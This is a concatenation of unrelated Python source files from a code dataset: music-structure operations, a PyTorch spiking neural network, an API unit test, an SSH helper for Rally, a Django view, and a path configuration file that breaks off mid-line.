(x.mod.__class__.__name__ == 'Tempo'):\n # remove(x.tree, amount*x.mod.value)\n #else:\n remove(x.tree, amount)\n return x\n else: raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\n\n# ======================== BEGIN UNTESTED ======================== #\n\n\ndef mFold(x, noteOp, restOp, seqOp, parOp, modOp): # Onsets can't reasonably be handled in this function. We are also unlikely to use it for anything.\n \"\"\"\n The mFold operation traverses a music value with a series of operations\n for the various constructors. 
noteOp takes a Note, restOp takes a Rest,\n    seqOp and parOp take the RESULTS of mFolding over their arguments, and\n    modOp takes a modifier (x.mod) and the RESULT of mFolding over its\n    tree (x.tree).\n    :param x:\n    :param noteOp:\n    :param restOp:\n    :param seqOp:\n    :param parOp:\n    :param modOp:\n    :return:\n    \"\"\"\n    #if (x.__class__.__name__ == 'Music'):\n    #    return mFold(x.tree, noteOp, restOp, seqOp, parOp, modOp) # todo?: update modOp to something relevant to Part\n    if (x.__class__.__name__ == 'Note'):\n        return noteOp(x)\n    elif (x.__class__.__name__ == 'Rest'):\n        return restOp(x)\n    elif (x.__class__.__name__ == 'Seq'):\n        vals = [mFold(t, noteOp, restOp, seqOp, parOp, modOp) for t in x.trees]\n        return seqOp(vals)\n    elif isinstance(x, Par):\n        vals = [mFold(t, noteOp, restOp, seqOp, parOp, modOp) for t in x.trees]\n        return parOp(vals)\n    elif (x.__class__.__name__ == 'Part'):\n        val = mFold(x.tree, noteOp, restOp, seqOp, parOp, modOp)\n        #return modOp(x.mod, val)\n        return val\n    else: raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\ndef firstPitch(x): # TO-DO: ONSET HANDLING\n    \"\"\"\n    The firstPitch function returns the first pitch in the Music value.\n    None is returned if there are no notes. Preference is left and top.\n    :param x:\n    :return:\n    \"\"\"\n    #if (x.__class__.__name__ == 'Music'):\n    #    return firstPitch(x.tree)\n    if (x.__class__.__name__ == 'Note'):\n        return x.pitch\n    elif (x.__class__.__name__ == 'Rest'):\n        return None\n    elif (x.__class__.__name__ == 'Seq' or isinstance(x, Par)):\n        vals = list(map(firstPitch, x.trees))\n        for v in vals:\n            if v is not None: # skip subtrees that contain no notes (e.g., all Rests)\n                return v\n        return None\n    elif (x.__class__.__name__ == 'Part'):\n        return firstPitch(x.tree)\n    else: raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\ndef getPitches(m):\n    \"\"\"\n    An application of mFold to extract all pitches in the music\n    structure as a list.\n    :param m:\n    :return:\n    \"\"\"\n    def fn(n): return [n.pitch]\n    def fr(r): return []\n    def fcat(vals): return sum(vals, []) # concatenate the per-subtree pitch lists (mFold passes one list argument)\n    def fm(m,t): return t\n    return mFold(m, fn, fr, fcat, fcat, fm)\n\n\ndef invertAt(m, pitchRef):\n    \"\"\"\n    Musical inversion around a reference pitch. 
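Each pitch p becomes 2*pitchRef - p; for example, pitch 64 inverted around 60 becomes 56. 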
Metrical structure\n    is preserved; only pitches are altered.\n    :param m:\n    :param pitchRef:\n    :return:\n    \"\"\"\n    def f(aNote): aNote.pitch = 2 * pitchRef - aNote.pitch\n    mMap(f, m) # mMap works in place, so return the modified structure itself\n    return m\n\n\ndef invert(m):\n    \"\"\"\n    Musical inversion around the first pitch in a musical structure.\n    :param m:\n    :return:\n    \"\"\"\n    p = firstPitch(m)\n    ret = invertAt(m, p)\n    return ret\n\n\ndef instrument(m, value):\n    \"\"\"\n    Shorthand for setting an instrument.\n    :param m:\n    :param value:\n    :return:\n    \"\"\"\n    return Part(m, Instrument(value)) # Modify(Instrument(value), m)\n\n\ndef removeInstruments(x):\n    \"\"\"\n    Remove Instrument modifiers from a musical structure\n    :param x:\n    :return:\n    \"\"\"\n    def checkInstMod(x): # function to get rid of individual nodes\n        if x.__class__.__name__ == 'Part':\n            #if x.mod.__class__.__name__ == 'Instrument': return x.tree\n            #else: return x\n            return x.tree\n        else: return x\n    #if x.__class__.__name__ == 'Music':\n    #    tNew = checkInstMod(x.tree)\n    #    removeInstruments(x.tree)\n    #    return x\n    if x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest':\n        return x\n    elif x.__class__.__name__ == 'Seq' or isinstance(x, Par):\n        newTrees = []\n        for t in x.trees:\n            newTrees.append(checkInstMod(t))\n        x.trees = list(map(removeInstruments, newTrees))\n        return x\n    elif x.__class__.__name__ == 'Part':\n        xNew = checkInstMod(x)\n        return xNew\n    else: raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\ndef changeInstrument(m, value):\n    x = removeInstruments(m)\n    return instrument(x, value)\n\n\n# Scale all durations in a music structure by the same amount.\ndef scaleDurations(m, factor):\n    def f(x): x.dur = x.dur*factor\n    mMapAll(f, m)\n    return m\n\ndef scaleDursOnsets(m, factor): # Option for use with onsets\n    def f(x):\n        x.dur = x.dur * factor\n        if (x.onset != None): x.onset = x.onset * factor\n    mMapAll(f,m)\n    return m\n\n# ======================== END UNTESTED ======================== #\n\n\n\n# =============================================================================================\n# Some extra supporting functions for compatibility with more pure vector/list\n# representations of melodies and chords.\n\n\n# Convert a pitch number to a single note. NO ONSET HANDLING (use deriveOnsets)\ndef pitchToNote(p, defDur=0.25, defVol=100):\n    if p==None:\n        return Rest(defDur)\n    else:\n        return Note(p, defDur, None, defVol)\n\n\n# Convert a list of pitches to a melody using a default note duration. NO ONSET HANDLING (use deriveOnsets)\ndef pitchListToMusic(ps, defDur=0.25, defVol=100):\n    ns = [pitchToNote(p, defDur, defVol) for p in ps]\n    return line(ns)\n\n\n# Synonym for consistency with some other naming schemes. 
# Synonym for consistency with some other naming schemes. NO ONSET HANDLING (use deriveOnsets)\n# This does the same thing as pitchListToMusic\ndef pitchListToMelody(ps, defDur=0.25, defVol=100):\n    return pitchListToMusic(ps, defDur, defVol)\n\ndef pdPairsToMusic(pds, defVol=100): # NO ONSET HANDLING (use deriveOnsets)\n    \"\"\"\n    Convert a list of pitch+duration pairs to a melody (a bunch of Notes in sequence).\n    pdPair = pitch-duration pair\n    :param pds: pairs of pitch and duration: [(p1,d1), (p2,d2), ...]\n    :param defVol: default volume\n    :return: music structure as a melody\n    \"\"\"\n    ns = [Note(x[0], x[1], None, defVol) for x in pds]\n    return line(ns)\n\ndef pdPairsToMelody(pds, defVol=100): # This is just a synonym for pdPairsToMusic - NO ONSET HANDLING\n    return pdPairsToMusic(pds, defVol)\n\ndef pdPairsToChord(pds, defVol=100): # NO ONSET HANDLING\n    \"\"\"\n    Convert a list of pitch+duration pairs to a chord (a bunch of Notes in parallel).\n    NOTE: start times will be the same for all pitches, but end times will be based on\n    the duration of the notes - so they may end at different times!\n    pdPair = pitch-duration pair\n    :param pds: pairs of pitch and duration: [(p1,d1), (p2,d2), ...]\n    :param defVol: default volume\n    :return: music structure as a chord\n    \"\"\"\n    ns = [Note(x[0], x[1], None, defVol) for x in pds]\n    return par(ns)\n\n\n# Convert a list of pitches to a chord (a bunch of Notes in parallel). NO ONSET HANDLING (use deriveOnsets)\ndef pitchListToChord(ps, defDur=0.25, defVol=100):\n    if ps == None:\n        return Rest(defDur)\n    else:\n        ns = [Note(p, defDur, None, defVol) for p in ps]\n        return par(ns)\n\n\n# Convert a list of chords (a list of lists of pitches) to a music structure. NO ONSET HANDLING (use deriveOnsets)\ndef chordListToMusic(chords, defDur=0.25, defVol=100):\n    cList = [pitchListToChord(x, defDur, defVol) for x in chords]\n    return line(cList)\n\n\ndef removeZeros(x): # MAY NEED TO HANDLE ONSETS IN DURATION CALL\n    #if (x.__class__.__name__ == 'Music'):\n    #    x.tree = removeZeros(x.tree)\n    #    return x\n    if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n        return x # can't remove at this stage\n    elif (x.__class__.__name__ == 'Seq' or isinstance(x, Par)):\n        newTrees = []\n        for t in x.trees:\n            t2 = removeZeros(t)\n            if dur(t2) > 0:\n                newTrees.append(t2)\n        x.trees = newTrees\n        return x\n    elif (x.__class__.__name__ == 'Part'):\n        x.tree = removeZeros(x.tree)\n        return x\n    else:\n        raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\ndef removeZerosOnset(x): # MAY NEED TO HANDLE ONSETS IN DURATION CALL\n    #if (x.__class__.__name__ == 'Music'):\n    #    x.tree = removeZerosOnset(x.tree)\n    #    return x\n    if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n        return x # can't remove at this stage\n    elif (x.__class__.__name__ == 'Seq' or isinstance(x, Par)):\n        newTrees = []\n        for t in x.trees:\n            t2 = removeZerosOnset(t)\n            if durOnset(t2) > 0:\n                newTrees.append(t2)\n        x.trees = newTrees\n        return x\n    elif (x.__class__.__name__ == 'Part'):\n        x.tree = removeZerosOnset(x.tree)\n        return x\n    else:\n        raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n
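# Editor's note: a hypothetical sketch of removeZeros (not part of the original file).\n# It assumes the Note(pitch, dur, onset, vol) signature used by pdPairsToMusic above.\ndef _demoRemoveZeros():\n    m = line([Note(60, 0.5, None, 100), Note(62, 0.0, None, 100)])\n    return removeZeros(m) # the zero-duration note is pruned from the sequence\n\n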
#=============================================================\n\ndef scaleTranspose1(pitchNum, halfsteps, scale):\n    '''\n    Transposes a single pitch within a scale by a certain number of halfsteps, if\n    it is possible to do so. If it isn't, a different interval +/-1 from the original\n    is selected at random to match the scale. Note: this strategy only works with\n    Major and Minor and would need reworking to be used with other scales like pentatonic.\n    :param pitchNum:\n    :param halfsteps:\n    :param scale:\n    :return:\n    '''\n    newPC = (halfsteps + pitchNum) % 12\n    if newPC in scale:\n        return pitchNum + halfsteps\n    else:\n        r = choice([-1,1])\n        return pitchNum + halfsteps + r\n\ndef scaleTransposeM(music, halfsteps, scale):\n    '''\n    Transposes an entire music value using scaleTranspose1\n    :param music:\n    :param halfsteps:\n    :param scale:\n    :return:\n    '''\n    def notefun(x):\n        newPNum = scaleTranspose1(x.pitch, halfsteps, scale)\n        x.pitch = newPNum\n    return mMap(notefun, music)\n\ndef scaleInvertAt(m, pitchRef, scale):\n    \"\"\"\n    Musical inversion around a reference pitch. Metrical structure\n    is preserved; only pitches are altered.\n    :param m:\n    :param pitchRef:\n    :return:\n    \"\"\"\n    #def f(aNote): aNote.pitch = scaleTranspose1(0, 2 * pitchRef - aNote.pitch, scale)\n    def f(aNote): aNote.pitch = scaleTranspose1(aNote.pitch, (2 * pitchRef) - (2 * aNote.pitch), scale)\n    ret = mMap(f, m)\n    return ret\n\n\ndef scaleInvert(m, scale):\n    \"\"\"\n    Musical inversion around the first pitch in a musical structure.\n    :param m:\n    :return:\n    \"\"\"\n    p = firstPitch(m)\n    ret = scaleInvertAt(m, p, scale)\n    return ret\n\ndef isNote(x): return x.__class__.__name__ == \"Note\"\ndef isRest(x): return x.__class__.__name__ == \"Rest\"\n\ndef stripRests(x):\n    if x.__class__.__name__ == \"Part\":\n        stripRests(x.tree)\n    elif x.__class__.__name__ == \"Seq\" or isinstance(x, Par):\n        for t in x.trees: # recursively strip rests from subtrees\n            stripRests(t)\n        okTrees = [t for t in x.trees if not (isRest(t))] # remove any rests appearing at this level\n        x.trees = okTrees\n    else:\n        pass\n\n\ndef fillRests(x):\n    if x.__class__.__name__ == \"Part\":\n        fillRests(x.tree)\n    elif x.__class__.__name__ == \"Seq\": # Note: we assume a non-empty tree here! Probably need to update later\n        newTrees = list()\n        currOnset = getOnset(x)\n        for t in x.trees:\n            o = getOnset(t)\n            if o > currOnset:\n                newTrees.append(Rest(o - currOnset, currOnset)) # pad the gap with an explicit Rest\n            newTrees.append(t) # keep the event itself whether or not a gap was filled\n            currOnset = o + dur(t) # advance past this event\n        x.trees = newTrees\n    elif isinstance(x, Par):\n        for t in x.trees:\n            fillRests(t) # Not sure how best to handle this. Do we necessarily want Rests within a Par?\n    else:\n        pass # don't need to alter existing notes and rests\n\n
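# Editor's note: a hypothetical sketch of scaleTransposeM (not part of the original\n# file). The pitch-class list below is an assumed encoding of C major.\ndef _demoScaleTranspose():\n    cMajorPCs = [0, 2, 4, 5, 7, 9, 11]\n    m = pitchListToMusic([60, 62, 64])\n    m2 = scaleTransposeM(m, 2, cMajorPCs) # shift up a whole step, staying in the scale\n    return getPitches(m2) # e.g. [62, 64, 65] or [62, 64, 67]\n\n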
# for generalizing transpose, invert etc. to lists of potentially disconnected items.\n\ndef inPlaceMusicOp(op, x):\n    if hasattr(x, '__iter__'):\n        for v in x:\n            op(v)\n    else:\n        op(x)\n\ndef retMusicOp(op, x):\n    if hasattr(x, '__iter__'):\n        vals = list()\n        for v in x:\n            vals.append(op(v))\n        return vals\n    else:\n        result = op(x)\n        return result\n\ndef flatten(musicVal): # remove unnecessary Seq and Par intermediate nodes\n    x = deepcopy(musicVal)\n    if x.__class__.__name__ == \"Seq\" or isinstance(x, Par):\n        newTrees = list()\n        for t in x.trees:\n            newTrees.append(flatten(t))\n        if len(newTrees) == 1:\n            return newTrees[0]\n        else:\n            x.trees = newTrees\n            return x\n    elif x.__class__.__name__ == \"Note\" or x.__class__.__name__ == \"Rest\":\n        return x\n    elif x.__class__.__name__ == \"Part\":\n        x.tree = flatten(x.tree)\n        return x\n    else:\n        raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n","sub_path":"MusECI/BasicOperations.py","file_name":"BasicOperations.py","file_ext":"py","file_size_in_byte":28134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"546758888","text":"from __future__ import print_function\nimport torch\nimport numpy as np\n\nfrom snn.utils import filters\nfrom snn.models.base import SNNetwork\n\n\nclass BinarySNN(SNNetwork):\n    def __init__(self, n_input_neurons, n_hidden_neurons, n_output_neurons, topology, synaptic_filter=filters.base_filter,\n                 n_basis_feedforward=1, n_basis_feedback=1, tau_ff=1, tau_fb=1, mu=1, initialization='uniform', weights_magnitude=0.01, device='cpu', save_path=None):\n\n        super(BinarySNN, self).__init__(n_input_neurons=n_input_neurons, n_hidden_neurons=n_hidden_neurons, n_output_neurons=n_output_neurons, topology=topology,\n                                        synaptic_filter=synaptic_filter, n_basis_feedforward=n_basis_feedforward, n_basis_feedback=n_basis_feedback, tau_ff=tau_ff,\n                                        tau_fb=tau_fb, mu=mu, initialization=initialization, weights_magnitude=weights_magnitude, device=device, save_path=save_path)\n\n\n        # Feedforward weights are a tensor of size [n_learnable_neurons, n_neurons, n_basis_feedforward] for which the block-diagonal elements are 0,\n        # and otherwise 1s in the topology are distributed according to initialization\n        self.ff_weights_shape = torch.Size([self.n_learnable_neurons, self.n_neurons, self.n_basis_feedforward])\n        self.feedforward_mask = torch.tensor(np.kron(topology, np.ones([self.n_basis_feedforward])).reshape(self.ff_weights_shape), dtype=torch.float).to(self.device)\n        assert self.feedforward_mask.shape == self.ff_weights_shape\n\n        self.initialize_ff_weights(topology, howto=initialization, gain=weights_magnitude)\n\n\n        # Feedback weights are a tensor of size [n_learnable_neurons, n_basis_feedback], for which learnable elements are distributed according to initialization\n        self.fb_weights_shape = torch.Size([self.n_learnable_neurons, self.n_basis_feedback])\n        self.initialize_fb_weights(topology, howto=initialization, gain=weights_magnitude)\n\n\n        # Bias weights are a tensor of size [n_learnable_neurons], for which learnable elements are distributed according to initialization\n        self.bias_shape = torch.Size([self.n_learnable_neurons])\n        self.initialize_bias_weights(topology, howto=initialization, gain=weights_magnitude)\n\n        # Number of timesteps to keep in memory\n        self.memory_length = max(self.tau_ff, self.tau_fb)\n\n        ### State of the network\n        self.spiking_history = torch.zeros([self.n_neurons, 2]).to(self.device)\n\n\n\n    def forward(self, input_signal):\n        assert self.n_neurons == (len(self.input_neurons) + len(self.hidden_neurons) + len(self.output_neurons)), \"The numbers of neurons don't match\"\n        assert
self.n_neurons == (len(self.learnable_neurons) + len(self.input_neurons)), \"The numbers of neurons don't match\"\n\n\n ### Compute potential\n ff_trace = self.compute_ff_trace(self.spiking_history[:, 1:])\n fb_trace = self.compute_fb_trace(self.spiking_history[:, 1:])[self.learnable_neurons, :]\n\n self.potential = self.compute_ff_potential(ff_trace) + self.compute_fb_potential(fb_trace) + self.bias\n\n ### Update spiking history\n self.spiking_history = self.update_spiking_history(input_signal)\n\n ### Compute log-probabilities\n # noinspection PyTypeChecker\n log_proba = self.spiking_history[self.learnable_neurons, -1] * torch.log(1e-07 + torch.sigmoid(self.potential)) \\\n + (1 - self.spiking_history[self.learnable_neurons, -1]) * torch.log(1. + 1e-07 - torch.sigmoid(self.potential)) # We add 1e-07 for numerical stability of the log\n\n assert log_proba.shape == torch.Size([self.n_learnable_neurons]), \\\n 'Wrong log_probability shape, got: ' + str(log_proba.shape) + ', expected: ' + str(torch.Size([self.n_learnable_neurons]))\n\n\n ### Compute gradients\n if self.training:\n self.compute_gradients(self.spiking_history[self.learnable_neurons, -1], self.potential, ff_trace, fb_trace)\n\n return log_proba\n\n\n\n ### Weights initialization\n def initialize_ff_weights(self, topology, howto='glorot', gain=0.):\n if howto == 'glorot':\n std = torch.tensor([torch.sqrt(torch.tensor(2.)) / ((torch.sum(topology[:, i]) + torch.sum(topology[i, :])) * self.n_basis_feedforward) for i in range(self.n_learnable_neurons)]).flatten()\n std = std.unsqueeze(1).unsqueeze(2).repeat(1, self.n_neurons, self.n_basis_feedforward)\n assert std.shape == self.ff_weights_shape\n self.feedforward_weights = (torch.normal(gain * std, std).to(self.device) * self.feedforward_mask)\n elif howto == 'uniform':\n self.feedforward_weights = (gain * (torch.rand(self.ff_weights_shape) * 2 - 1).to(self.device) * self.feedforward_mask)\n\n self.ff_grad = torch.zeros(self.ff_weights_shape).to(self.device)\n\n def initialize_fb_weights(self, topology, howto='glorot', gain=0.):\n if howto == 'glorot':\n std = torch.tensor([torch.sqrt(torch.tensor(2.) 
/ (torch.sum(topology[:, i]) + torch.sum(topology[i, :]))) for i in range(self.n_learnable_neurons)]).flatten()\n std = std.unsqueeze(1).repeat(1, self.n_basis_feedback)\n assert std.shape == self.fb_weights_shape\n self.feedback_weights = (torch.normal(gain * std, std)).to(self.device)\n elif howto == 'uniform':\n self.feedback_weights = (gain * (torch.rand(self.fb_weights_shape) * 2 - 1)).to(self.device)\n\n self.fb_grad = torch.zeros(self.fb_weights_shape).to(self.device)\n\n def initialize_bias_weights(self, topology, howto='glorot', gain=0.):\n if howto == 'glorot':\n std = torch.tensor([torch.sqrt(torch.tensor(2.)) / (torch.sum(topology[:, i]) + torch.sum(topology[i, :])) for i in range(self.n_learnable_neurons)]).flatten()\n assert std.shape == self.bias_shape\n self.bias = (torch.normal(gain * std, std)).to(self.device)\n elif howto == 'uniform':\n self.bias = (gain * (torch.rand(self.bias_shape) * 2 - 1)).to(self.device)\n\n self.bias_grad = torch.zeros(self.bias_shape).to(self.device)\n\n\n\n ### Computations\n def compute_ff_trace(self, spikes):\n return torch.matmul(spikes.flip(-1), self.feedforward_filter[:spikes.shape[-1]])\n\n\n def compute_fb_trace(self, spikes):\n return torch.matmul(spikes.flip(-1), self.feedback_filter[:spikes.shape[-1]])\n\n\n def compute_ff_potential(self, ff_trace):\n return torch.sum(self.feedforward_weights * ff_trace * self.feedforward_mask, dim=(-1, -2))\n\n\n def compute_fb_potential(self, fb_trace):\n return torch.sum(self.feedback_weights * fb_trace, dim=(-1))\n\n\n def generate_spikes(self, spiking_history, neurons_group):\n spiking_history[neurons_group, -1] = torch.bernoulli(torch.sigmoid(self.potential[neurons_group - self.n_input_neurons])).to(self.device)\n\n if torch.isnan(spiking_history).any():\n print('Spiking history')\n print(self.spiking_history[neurons_group, -1])\n print('Inputs')\n print(self.spiking_history[self.input_neurons, -5:])\n print('Potential')\n print(self.potential[neurons_group - self.n_input_neurons])\n\n raise RuntimeError\n\n return spiking_history\n\n def update_spiking_history(self, input_signal):\n spiking_history = torch.cat((self.spiking_history[:, - self.memory_length:], torch.zeros([self.n_neurons, 1]).to(self.device)), dim=-1)\n spiking_history[self.visible_neurons, -1] = input_signal\n\n if self.n_hidden_neurons > 0:\n spiking_history = self.generate_spikes(spiking_history, self.hidden_neurons)\n if not self.training:\n spiking_history = self.generate_spikes(spiking_history, self.output_neurons)\n\n return spiking_history\n\n\n def compute_gradients(self, spikes, potential, feedforward_trace, feedback_trace):\n self.bias_grad = spikes - torch.sigmoid(potential)\n assert self.bias_grad.shape == self.bias.shape, \"Wrong bias gradient shape\"\n\n self.ff_grad = feedforward_trace.unsqueeze(0).repeat(self.n_learnable_neurons, 1, 1) \\\n * self.bias_grad.unsqueeze(1).repeat(1, self.n_neurons).unsqueeze(2).repeat(1, 1, self.n_basis_feedforward) \\\n * self.feedforward_mask\n assert self.ff_grad.shape == self.ff_weights_shape, \"Wrong feedforward weights gradient shape\"\n\n self.fb_grad = feedback_trace * self.bias_grad.unsqueeze(1).repeat(1, self.n_basis_feedback)\n assert self.fb_grad.shape == self.fb_weights_shape, \"Wrong feedback weights gradient shape\"\n","sub_path":"snn/models/SNN.py","file_name":"SNN.py","file_ext":"py","file_size_in_byte":8666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"496124065","text":"# -*- coding: utf-8 -*-\n#\n# 
Copyright (C) 2010-2015 YVertical.\n# Ding Guijin, guijin.ding@yvertical.com\n#\n\nfrom ppmessage.core.constant import OS\n\nfrom ppmessage.core.constant import CONVERSATION_TYPE\nfrom ppmessage.core.constant import PPMESSAGE_APP\n\nfrom ppmessage.core.utils.getipaddress import getIPAddress\nfrom ppmessage.db.models import DeviceUser\n\nimport tornado.httpclient\nimport uuid\nimport unittest\nimport traceback\nimport json\nimport uuid\nimport redis\nimport hashlib\n\nclass TestPageUnackedMessageCase(unittest.TestCase):\n def setUp(self):\n self._redis = redis.Redis(db=1)\n return\n\n def tearDown(self):\n pass\n\n def _get_return(self, _name):\n if self._return_data == None:\n return None\n return self._return_data.get(_name)\n \n def _prepare_login_signature(self, _uuid, _pass):\n _pass = hashlib.sha1(_pass).hexdigest()\n _sig = hashlib.sha1(_uuid + _pass).hexdigest();\n return _sig\n\n def _prepare_login_user_uuid(self, _email):\n _key = DeviceUser.__tablename__ + \".user_email.\" + _email\n _uuid = self._redis.get(_key)\n return _uuid\n \n def _prepare(self, _cmd):\n _request_uuid = str(uuid.uuid1())\n _secret = PPMESSAGE_APP[\"secret\"] + _request_uuid\n _request_signature = hashlib.sha1(_secret).hexdigest()\n\n _headers = {}\n _headers[\"Content-Type\"] = \"application/json\"\n _headers[\"X-If-IMAPP\"] = \"true\"\n _headers[\"X-App-Key\"] = PPMESSAGE_APP[\"key\"]\n _headers[\"X-Request-UUID\"] = _request_uuid\n _headers[\"X-Request-Signature\"] = _request_signature\n\n self._headers = _headers\n \n _http = \"https://\"\n _host = \"ppmessage.cn\"\n _port = 80\n if DEV_MODE:\n _host = getIPAddress()\n _http = \"http://\"\n _port = 8080\n\n self._url = _http + _host + \":\" + str(_port) + \"/api/\" + _cmd\n return\n \n def _exec(self, _data):\n http_client = tornado.httpclient.HTTPClient()\n try:\n response = http_client.fetch(self._url,\n method=\"POST\",\n headers=self._headers,\n body=json.dumps(_data))\n #print(response.body)\n _r = json.loads(response.body)\n self._return_data = None\n if _r[\"error_code\"] == 0:\n self._return_data = _r\n\n if _r[\"error_code\"] != 0:\n print(_r)\n \n self.assertEqual(_r[\"error_code\"], 0)\n \n except tornado.httpclient.HTTPError as e:\n self.assertEqual(1, 0)\n finally:\n http_client.close()\n \n return\n \n def test_pp_page_user_conversation(self):\n _app_uuid = \"1e47652b-8907-11e5-a8af-58b035f16bf4\"\n _user_uuid = \"526d2898-9a26-11e5-b287-00163e00061e\"\n _device_uuid = \"d2a7f6e0-abca-11e5-b287-00163e00061e\"\n\n _api = \"PP_PAGE_UNACKED_MESSAGE\"\n _data = {\"app_uuid\": _app_uuid, \"user_uuid\": _user_uuid, \"device_uuid\": _device_uuid}\n self._prepare(_api)\n self._exec(_data)\n return\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","sub_path":"ppmessage/unittest/api/testPageUnackedMessage.py","file_name":"testPageUnackedMessage.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"395512514","text":"# Copyright 2013: Mirantis Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport eventlet\nimport os\nimport paramiko\nimport random\nimport select\nimport socket\nimport string\nimport time\n\nfrom rally import exceptions\nfrom rally.openstack.common.gettextutils import _ # noqa\nfrom rally.openstack.common import log as logging\n\nLOG = logging.getLogger(__name__)\n\n\nclass SSH(object):\n \"\"\"SSH common functions.\"\"\"\n\n def __init__(self, ip, user, port=22, key=None, timeout=1800):\n \"\"\"Initialize SSH client with ip, username and the default values.\n\n timeout - the timeout for execution of the command\n \"\"\"\n self.ip = ip\n self.user = user\n self.timeout = timeout\n self.client = None\n if key:\n self.key = key\n else:\n self.key = os.path.expanduser('~/.ssh/id_rsa')\n\n def _get_ssh_connection(self):\n self.client = paramiko.SSHClient()\n self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n self.client.connect(self.ip, username=self.user, key_filename=self.key)\n\n def _is_timed_out(self, start_time):\n return (time.time() - self.timeout) > start_time\n\n def execute(self, *cmd):\n \"\"\"Execute the specified command on the server.\"\"\"\n self._get_ssh_connection()\n cmd = ' '.join(cmd)\n transport = self.client.get_transport()\n channel = transport.open_session()\n channel.fileno()\n channel.exec_command(cmd)\n channel.shutdown_write()\n poll = select.poll()\n poll.register(channel, select.POLLIN)\n start_time = time.time()\n while True:\n ready = poll.poll(16)\n if not any(ready):\n if not self._is_timed_out(start_time):\n continue\n raise exceptions.TimeoutException('SSH Timeout')\n if not ready[0]:\n continue\n out_chunk = err_chunk = None\n if channel.recv_ready():\n out_chunk = channel.recv(4096)\n LOG.debug(out_chunk)\n if channel.recv_stderr_ready():\n err_chunk = channel.recv_stderr(4096)\n LOG.debug(err_chunk)\n if channel.closed and not err_chunk and not out_chunk:\n break\n exit_status = channel.recv_exit_status()\n if 0 != exit_status:\n raise exceptions.SSHError(\n 'SSHExecCommandFailed with exit_status %s'\n % exit_status)\n self.client.close()\n\n def upload(self, source, destination):\n \"\"\"Upload the specified file to the server.\"\"\"\n if destination.startswith('~'):\n destination = '/home/' + self.user + destination[1:]\n self._get_ssh_connection()\n ftp = self.client.open_sftp()\n ftp.put(os.path.expanduser(source), destination)\n ftp.close()\n\n def execute_script(self, script, enterpreter='/bin/sh'):\n \"\"\"Execute the specified local script on the remote server.\"\"\"\n destination = '/tmp/' + ''.join(\n random.choice(string.lowercase) for i in range(16))\n\n self.upload(script, destination)\n self.execute('%s %s' % (enterpreter, destination))\n self.execute('rm %s' % destination)\n\n def wait(self, timeout=120, interval=1):\n \"\"\"Wait for the host will be available via ssh.\"\"\"\n with eventlet.timeout.Timeout(timeout, exceptions.TimeoutException):\n while True:\n try:\n return self.execute('uname')\n except (socket.error, exceptions.SSHError) as e:\n LOG.debug(\n _('Ssh is still unavailable. 
(Exception was: %r)') % e)\n eventlet.sleep(interval)\n","sub_path":"rally/sshutils.py","file_name":"sshutils.py","file_ext":"py","file_size_in_byte":4319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"533227596","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse\n# Create your views here.\n\nfrom .models import product\n\ndef product_list(request):\n queryset = product.objects.all()\n context = {\n \"object_list\": queryset,\n \"title\": \"List\"\n\n }\n template = 'product_list.html'\n return render(request, template, context)\n\ndef product_detail(request, id=None):\n #instance = product.objects.get(id=1)\n instance = get_object_or_404(product, id=id)\n context = {\n \"title\": instance.author,\n \"instance\": instance,\n }\n return render(request, \"product_detail.html\", context)\n\n","sub_path":"src/product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"27558602","text":"import os\n# note or checking\n# ------------------------------------------------------------------------------------\n# Root Folders\n# ------------------------------------------------------------------------------------\nroot_directory = os.path.dirname(__file__)\nroot_participation_directory = os.path.join(root_directory, 'data')\n\n\n# ------------------------------------------------------------------------------------\n# Folder references\n# ------------------------------------------------------------------------------------\nreference_directory=os.path.join(root_directory,'static/reference_directory')\nreference_directory_images=os.path.join(root_directory,'static/recommendation_output')\ninterface_images=os.path.join(root_directory,'static/images')\nmodel_directory=os.path.join(root_directory,'style_transfer_models')\noverall_results_directory = os.path.join(root_directory,'overall_results')\n\n\n# ------------------------------------------------------------------------------------\n# Files references\n# ------------------------------------------------------------------------------------\nlink_base_image = os.path.join(interface_images, 'base_image.jpg')\nlink_base_image_png = os.path.join(interface_images, 'base_image_png.png')\nlink_base_image_warning = os.path.join(interface_images, 'base_image_warning.jpg')\nlink_base_image_large = os.path.join(interface_images, 'base_image_large.jpg')\nlink_base_image_large_annotated = os.path.join(interface_images, 'base_image_large_annotated.jpg')\nlink_styles_catalogue = os.path.join(interface_images, 'overall_style.jpg')\nlink_outcome_success = os.path.join(interface_images, 'outcome_success.jpg')\nlink_outcome_failure = os.path.join(interface_images, 'outcome_failure.jpg')\nlink_feedback_massing_base = os.path.join(interface_images, 'feedback_massing_base.jpg')\nclick_on_screen = os.path.join(interface_images, 'cick_on_screen.jpg')\nucl_east_image = os.path.join(interface_images, 'ucl_east_marshgate.jpg')\ndatabse_filepath = os.path.join 